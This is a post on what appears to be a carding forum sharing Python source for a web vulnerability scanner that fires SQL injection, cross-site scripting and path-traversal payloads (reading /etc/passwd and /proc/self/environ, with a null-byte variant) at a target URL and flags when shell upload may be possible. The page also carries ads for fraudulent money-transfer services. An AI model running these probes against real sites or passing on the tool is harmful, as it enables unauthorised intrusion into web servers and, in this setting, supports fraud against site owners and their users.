We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
SQLi,LFI,XSS Scanner [Source]

#1
Code:
#!usr/bin/python
import os, sys, urllib

if sys.platform == 'linux' or sys.platform == 'linux2':
   clearing = ' clear'
else:
   clearing = 'cls'
os.system(clearing)

print("################################################")
print("# SQli,XSS,LFI scanner by Quetzalcoatl         #")
print("# Version 1.0   12/04/2012                     #")
print("# Greetz to Baltazar,c0ax...                   #")
print("# https://www.ljuska.org                        #")
print("# Ex: https://www.somesite.com/index.php?id=1   #")
print("################################################")

sqligreska1 = "You have an error"
sqligreska2 = "Query failed"
sqligreska3 = "mysql_fetch_array()"
htmlxsstext = '<h1>ljuska</h1>'
lfigreska = "root:x:0:0"
lfienviron = "DOCUMENT_ROOT"
lfienviron = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ"
lfitext = "../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
lfitextnull = "../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
jsxsstext = """"<script>document.write('XSSLjuska')</script> """
link = raw_input("Link za skeniranje: ")
xsshtml = link + htmlxsstext
str = link;
trebami, netrebami = str.split('=')

urllib.urlretrieve(xsshtml,'xsshtml.txt')
print ""
xssjs = link + jsxsstext
urllib.urlretrieve(xssjs,'xssjs.txt')
sqli = link + "'"
urllib.urlretrieve(sqli,'sqli.txt')
xsshtmltext = open("xsshtml.txt","r").read()
if htmlxsstext in xsshtmltext :
   print "XSS HTML [+]"
   print ""
else :
   print "XSS HTML [-]"
   print ""
xssjstext = open("xssjs.txt","r").read()
if jsxsstext in xssjstext :
   print "XSS JS [+]"
   print ""
else :
   print "XSS JS [-]"
   print ""
sqlitext = open("sqli.txt","r").read()
if sqligreska1 in sqlitext :
   print "SQLi [+]"
   print ""
else :
   if sqligreska2 in sqlitext :
      print "SQLi [+]"
      print ""
   else :
      if sqligreska3 in sqlitext :
         print "SQLi [+]"
         print ""
      else :
         print "SQLi [-]"
         print ""

lfietc = trebami+'=' + lfitext
lfietc1 = trebami+'=' + lfitextnull
lfiproc = trebami+'='+lfienviron
urllib.urlretrieve(lfiproc,'lfiproc.txt')
urllib.urlretrieve(lfietc,'lfi.txt')
urllib.urlretrieve(lfietc1,'lfi1.txt')
lfiprocenviron = open("lfiproc.txt","r").read()
lfietctext = open("lfi.txt","r").read()
lfietctext1 = open("lfi1.txt","r").read()
if lfigreska in lfietctext :
   print "LFI [+]"
   print ""
   if lfienviron in lfiprocenviron :
      print "It's possible to upload shell"
else :
   if lfigreska in lfietctext1 :
      print "LFI [+] with nullbyte"
      print ""
   else :
      print "LFI [-]"
      print ""
os.remove("lfiproc.txt")
os.remove("lfi.txt")
os.remove("lfi1.txt")
os.remove("xssjs.txt")
os.remove("xsshtml.txt")
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted WesternUnion / MoneyGram / Bank - Transferring -WorldWide [ MTCN in 3 hours ]




Forum Jump: